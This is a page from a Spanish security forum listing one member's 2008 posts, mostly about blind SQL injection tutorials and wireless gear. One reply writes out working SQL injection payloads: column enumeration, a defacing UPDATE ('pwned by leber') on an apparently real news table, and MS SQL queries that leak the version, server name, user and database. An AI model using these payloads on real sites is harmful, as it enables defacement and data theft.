últimos mensajes de: pedrox@ - Página 3

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

13 Mayo 2024, 17:54 pm

Tema destacado: Introducción a Git (Primera Parte)

Mostrar Mensajes
Páginas: 1 2 [3]

21	Seguridad Informática / Materiales y equipos / ¿Que les parece este chip?	en: 6 Agosto 2008, 10:04 am
Hola buenas tenia idea de comprar una tarjeta con el chip "Zydas 1211b" y una antena de 9 dBi omnidireccional. ¿Qué les parece ese chip? Sirve para auditoria wireless? Puedo usar la tarjeta para conectarme desde windows y linux? Sobre que precio podría salir? Saludos.

22	Seguridad Informática / Abril negro / Re: Abril Negro 2008: Taller de ASM	en: 31 Julio 2008, 21:31 pm
Esta perfecto e0n, espero la segunda parte Te quedará un buen taller. salu2

23	Seguridad Informática / Nivel Web / Re: Blind MySql Injection by Ka0x	en: 1 Mayo 2008, 14:13 pm
jajajaja en fin ... sigue usando SQLNinja ! paso de discutir en el foro. Saludos.

24	Seguridad Informática / Nivel Web / Re: Blind MySql Injection by Ka0x	en: 30 Abril 2008, 21:20 pm
Cita de: Snap90210 en 30 Abril 2008, 04:43 am Para el SQL-blind recomiendo el SQLninja es genial ! ¿De que te sirve usar una herramienta sin saber que operación realiza? Saludos.

25	Seguridad Informática / Nivel Web / Re: Blind MySql Injection by Ka0x	en: 28 Abril 2008, 22:42 pm
El argumento -p es el patron de busqueda. Osea cuando da un valor true (cuando se muestra la información de la página correctamente), suele mostrar: user_id, username. Cualquier palabra que aparezca cuando el valor es true puede ser el argumento -p. En la imagen que ponen de la ejecución del script en el pdf ponen en el agumento si te fijas "user_id". Claro esta que con que podrias "id" ya te valdria Saludos.

26	Seguridad Informática / Nivel Web / Re: Blind MySql Injection by Ka0x	en: 28 Abril 2008, 21:48 pm
Cita de: GiRLaZo en 28 Abril 2008, 20:26 pm Saludos Gracias, no me habia dado cuenta del enorme fallo pero ahora mi duda es que ejecuto el archivo perl... con cmd.exe guardo el archivo como blind.pl voy a abrirlo con el CMD.exe y me abre un bloc de notas con el codigo =( ?? como hago para que se ejecute devidamente? Atte:GiR Yo el script lo probe en WINDOWS y no rula, al parecer esta hecho para LINUX. Pruebalo en Linux, guardas el código como blind.pl, vas a la terminal, vas al directorio donde hayas dejado el script y lo ejecutas: # perl blind.pl <argumentos del script> ó # ./blind.pl <argumentos del script> Saludos.

27	Seguridad Informática / Nivel Web / Re: Blind MySql Injection by Ka0x	en: 27 Abril 2008, 22:36 pm
Cita de: GiRLaZo en 27 Abril 2008, 22:06 pm Saludos. Tengo un problema y es que cuando he subido la base de datos... y esta todo echo pero cuando lo cargo... es decir cuando abro el archivo php... me dice "No hay columnas". La verdad, no se donde esta el fallo, he echo bien lo del config, he subido el SQL posteado a mi base de datos y nada, me da ese error... Atte: GiR hombre lógico, si entras http://localhost/vulnerable.php no seleccionas ningun registro de la base de datos y el script muere diciendo que "No hay columnas": Código if(@mysql_num_rows($query)==0){ die('No hay columnas'); } pero si haces: http://localhost/vulnerable.php?id=1 Pues ya te saldra el usuario "administrator". Saludos.

28	Seguridad Informática / Nivel Web / Re: Duda con SQL injection	en: 27 Abril 2008, 15:44 pm
aver....... El simbolo + no te hace falta que lo pongas antes de la coma, podria quedar asi: Código: id=456+group+by+noticias.ANTETITULO,noticias.TITULO,noticias.ENTRADILLA,noticias.FECHA,noticias.HEAD,noticias.TEXTO+having+1=1-- Si te sigue tirando error, puede ser porque ya no existan mas columnas. Si quieres updatear una, puedes hacer: Código: id=456+update+noticias+set+TITULO+=+'pwned by leber'-- Si quieres obtener la versión del servidor MS SQL, con que hagas esto ya te vale: id=1+and+1=convert(int,@@version)-- Nombre del servidor: id=1+and+1=convert(int,@@servername)-- Nombre del usuario de la DB: id=1+and+1=convert(int,system_user) Nombre de la DB de la página web: id=1+and+1=convert(int,db_name()) Espero que te sirva. Saludos.

29	Seguridad Informática / Nivel Web / Re: Blind MySql Injection by Ka0x	en: 26 Abril 2008, 21:46 pm
w0w! Lo leí y esta perfecto ademas metieron códigos de ejemplo Asi si que se entiende 100% Saludos.

30	Seguridad Informática / Nivel Web / Re: duda con BSQL	en: 15 Abril 2008, 18:41 pm
magic_quotes_gpc

Páginas: 1 2 [3]

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines